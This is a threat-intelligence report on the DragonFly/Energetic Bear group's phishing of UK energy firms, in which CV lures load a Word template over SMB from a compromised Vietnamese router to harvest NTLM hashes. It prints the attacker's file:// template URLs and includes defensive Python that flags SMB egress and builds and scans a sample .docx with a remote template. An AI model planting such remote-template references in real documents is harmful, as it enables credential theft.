Energetic DragonFly DYMALLOY Bear 2.0

Introduction

New research from Cylance identifies for the first time the use of a compromised core router as one of the tools wielded by the threat actor that has recently been accused by the United States government of acting in the interests of Russia to attack government agencies and organizations in the “energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.”

This is a discovery whose significance far outweighs its size, given that core router compromises are considerably harder to detect, analyze, patch, and remediate than compromises of PCs.

Background

On March 15, the U.S. government announced new sanctions against what it called “Russian cyber actors” for interference in the 2016 presidential election and the NotPetya attack. In the course of that announcement, the government alluded to the fact that “Russian government cyber actors have also targeted U.S. government entities and multiple U.S. critical infrastructure sectors,” including energy and nuclear power companies.

This constitutes the first time that the U.S. government has publicly attributed these attacks to the Russians. In the wake of this announcement, the FBI and DHS released the details in a new Joint Analysis report.

This marks the third time that the U.S. government has published such information: the first was a private warning in June 2017, followed by a broader public report in October 2017. While these government warnings are new, this threat actor (known variously as DragonFly, Energetic Bear, Crouching Yeti, DYMALLOY, and Group 24) has been the subject of investigation and public reporting by the security industry for years, including at Cylance.

After this threat actor’s operations were initially exposed in 2013 and 2014 in a series of widely discussed research reports that led to the different group names mentioned above, Cylance observed the actor go dark for a period of about a year, during which time we believe the group was actively retooling.

Then, in early 2015 – before U.S. nuclear and energy companies became a target – energy companies in other countries were similarly compromised, both in the nuclear and oil industries. It has already been reported that facilities in Ireland and Turkey were among those targeted.

Cylance research has uncovered additional targets from earlier periods, the most notable of which is a large mining and power company in Kazakhstan.

More recently, Cylance has discovered that a core Cisco router relied upon by one of Vietnam’s largest oil rig manufacturers was compromised by the same threat group in an endeavor to harvest credentials that were later used to attempt to penetrate a handful of energy companies in the UK around March of 2017.

Technical Findings

In mid-July of 2017, Motherboard published a news report it claimed was based on a leaked document from Britain’s National Cyber Security Centre, or NCSC. The NCSC is a division of the country’s signals intelligence agency, GCHQ.

According to Motherboard, the document contained an alert aimed at the country’s energy sector warning of “connections from multiple UK IP addresses to infrastructure associated with advanced state-sponsored hostile threat actors, who are known to target the energy and manufacturing sectors” which “likely” resulted in compromise, beginning in early June of 2017.

Motherboard paraphrased the technical details of the attack contained in the leaked document: “Specifically with the intrusions reported in the NCSC document, the infrastructure in organizations is connecting to a set of malicious IP addresses using SMB, a data transfer protocol, as well as HTTP. The report suggests that the hackers may be trying to capture victims' passwords, and provides a set of mitigations for victims, such as turning on multi-factor authentication for industrial systems.”

Cylance research supports this analysis and sheds new light on the campaign.

We observed a phishing operation that targeted energy sector organizations in the UK. The attacks began with two phishing documents, in the same manner as the incidents covered in earlier reports: all relied on the Redirect to SMB behavior of Windows, in which a file:// reference to a remote host causes the client to attempt NTLM authentication to that host.

Cylance previously disclosed and analyzed this feature in a 2015 report (PDF).

Following the modus operandi of previous attacks, both documents purported to be the curriculum vitae of a “Jacob Morrison.” When an unsuspecting user opened one of the documents, Word fetched a remote template and automatically attempted to authenticate to the malicious SMB server at 123.30.96.18, handing over the victim's NTLMv2 challenge-response (a Net-NTLMv2 hash) rather than the cleartext password; such a response can be cracked offline or relayed to other services that accept NTLM. All of this occurred surreptitiously, without any kind of warning prompt.
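The network side of that authentication leak is what the NCSC alert describes: an internal workstation opening SMB (TCP/445) to a public address, or HTTP to the same host when 445 is blocked and Windows falls back to WebDAV. The following Python is an added example, not Cylance's tooling, showing how a defender would sweep firewall or flow logs for it. The log lines are constructed for illustration; the only real address is the 123.30.96.18 indicator from this report, and the key=value log format is an assumption.

```python
"""Find hosts that attempted SMB (and probable WebDAV fallback) to the internet.

Added example, not part of the original report. SAMPLE_LOG is a constructed
firewall log in an assumed key=value format; only 123.30.96.18 is a real
indicator from the report.
"""
import ipaddress
import re
from typing import Dict, List

SMB_PORTS = {445, 139}
IOC_ADDRESSES = {"123.30.96.18"}  # from the report

# Constructed sample log, not a real capture. 91.121.30.40 and 93.184.216.34
# are arbitrary public addresses used only to exercise the logic.
SAMPLE_LOG = """\
2017-06-02T10:15:31Z src=10.20.30.44 dst=10.20.30.5 dport=445 proto=tcp action=allow
2017-06-02T10:15:33Z src=10.20.30.44 dst=123.30.96.18 dport=445 proto=tcp action=allow
2017-06-02T10:15:34Z src=10.20.30.44 dst=123.30.96.18 dport=80 proto=tcp action=allow
2017-06-02T10:16:02Z src=10.20.31.17 dst=91.121.30.40 dport=445 proto=tcp action=deny
2017-06-02T10:16:05Z src=10.20.31.17 dst=91.121.30.40 dport=80 proto=tcp action=allow
2017-06-02T10:17:40Z src=10.20.30.44 dst=93.184.216.34 dport=443 proto=tcp action=allow
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=(?P<proto>\S+) action=(?P<action>\S+)$"
)


def is_public(addr: str) -> bool:
    """True for globally routable addresses (RFC1918, loopback, doc ranges excluded)."""
    return ipaddress.ip_address(addr).is_global


def find_smb_leaks(log_text: str) -> List[Dict]:
    """One finding per (src, dst) pair that attempted SMB to a public address.

    A later allowed port-80 connection from the same source to the same host is
    recorded as http_after_smb: when 445 is denied this is the WebDAV fallback,
    which still carries NTLM authentication.
    """
    attempts: Dict[tuple, Dict] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        f = m.groupdict()
        dport = int(f["dport"])
        key = (f["src"], f["dst"])
        if dport in SMB_PORTS and is_public(f["dst"]):
            finding = attempts.setdefault(key, {
                "src": f["src"],
                "dst": f["dst"],
                "first_seen": f["ts"],
                "smb_allowed": False,
                "http_after_smb": False,
                "known_ioc": f["dst"] in IOC_ADDRESSES,
            })
            finding["smb_allowed"] = finding["smb_allowed"] or f["action"] == "allow"
        elif dport == 80 and key in attempts and f["action"] == "allow":
            attempts[key]["http_after_smb"] = True
    return list(attempts.values())


if __name__ == "__main__":
    for hit in find_smb_leaks(SAMPLE_LOG):
        print(hit)
```

Any source host in the output should be treated as having leaked a Net-NTLMv2 response; the practical fix is to deny TCP/445 and 139 egress at the perimeter and to reset the credentials of users on the flagged hosts.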

Cylance found that the two separate documents called back to:

file://123.30.96.18/Noto.dotm; and

file://123.30.96.18/Table.dotm

The URLs were contained in the file “word/_rels/settings.xml.rels”, referenced by the relationship ID “rId1337.” A snippet is below:


Figure 1: Contents of settings.xml.rels

The continued use of this ID is odd, since it could easily be changed and would then likely bypass even more of the already limited antivirus detections. The same ID had previously been linked to the Phishery GitHub project by Ryan Hanson, and that link was highlighted publicly by Cisco.
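A document-side check for this technique is to open the .docx as a ZIP archive and inspect the attachedTemplate relationship in word/_rels/settings.xml.rels for a target that points off-host. The Python below is an added example, not code from Cylance or from Phishery: it constructs a minimal .docx in memory (a stand-in, not one of the real phishing documents) whose relationship points at the address from this report, then scans it. The check also records whether the relationship reuses the rId1337 identifier discussed above.

```python
"""Flag Office documents whose attached template is fetched from a remote host.

Added example, not part of the original report. build_sample_docx() creates
a constructed minimal .docx for testing; it is not one of the real lures.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
SETTINGS_RELS = "word/_rels/settings.xml.rels"
PHISHERY_DEFAULT_ID = "rId1337"  # identifier noted in the report


def is_remote_target(target: str) -> bool:
    """True if loading the target makes Word reach another host.

    file://host/share and \\host\share trigger SMB (or WebDAV fallback);
    http(s) targets go out over WebDAV. A local path such as
    file:///C:/Users/x/Normal.dotm has an empty host and is not flagged.
    """
    if target.startswith("\\\\"):
        return True
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme in ("http", "https"):
        return True
    if scheme == "file":
        return bool(parsed.netloc)
    return False


def scan_docx(data: bytes) -> List[Dict]:
    """Return one finding per attachedTemplate relationship with a remote target."""
    findings: List[Dict] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if SETTINGS_RELS not in z.namelist():
            return findings  # no attached template at all
        root = ET.fromstring(z.read(SETTINGS_RELS))
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        if not is_remote_target(target):
            continue
        findings.append({
            "id": rel.get("Id"),
            "target": target,
            "target_mode": rel.get("TargetMode", ""),
            "phishery_default_id": rel.get("Id") == PHISHERY_DEFAULT_ID,
        })
    return findings


def build_sample_docx(template_url: str, rel_id: str = PHISHERY_DEFAULT_ID) -> bytes:
    """Constructed minimal .docx with an external attachedTemplate (sample input only)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="{rel_id}" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder parts
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx("file://123.30.96.18/Noto.dotm")):
        print(finding)
```

Run scan_docx() over a real document's bytes to apply the same check; a remote target is the actionable signal, and a rId1337 match is corroborating evidence only, since the identifier is trivially changed.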

The IP address “123.30.96.18”, by contrast, turned out to be quite interesting: it was an end-of-life Cisco infrastructure router belonging to a large state-owned Vietnamese energy conglomerate.

The threat actor used this core router to harvest the phished credentials, which were likely later used to compromise energy sector targets in the UK.

The compromised routing device appears to have served as a credential collection point only very briefly.

Conclusion

The use of compromised routing infrastructure for collection or command-and-control purposes is not new, but it is rarely detected. A router compromise very likely involves the router’s firmware, and the forensic investigator has far fewer tools for examining firmware than for examining a PC. Analysis is further hampered by the lack of system logs.

The fact that the threat actor is using this type of infrastructure is a serious and worrisome discovery, since once exploited, vulnerabilities in core infrastructure like routers are not easily closed or remediated.

While the end goals of these campaigns can only be speculated upon, their very existence across an array of power companies in several countries should be of great concern to governments, the companies themselves, and all those who rely upon their critical services.

Indicators of Compromise (IOCs):

SHA256 Hashes:

9444b44eac0c8436039a2a4e8575d75f5b2d0d37361ace169b49f2149d1bfc48

e2c54649f090a9e8ca4ef3416e7bd5024fbc4c3b1ecc5cd7855afcd02f7a412a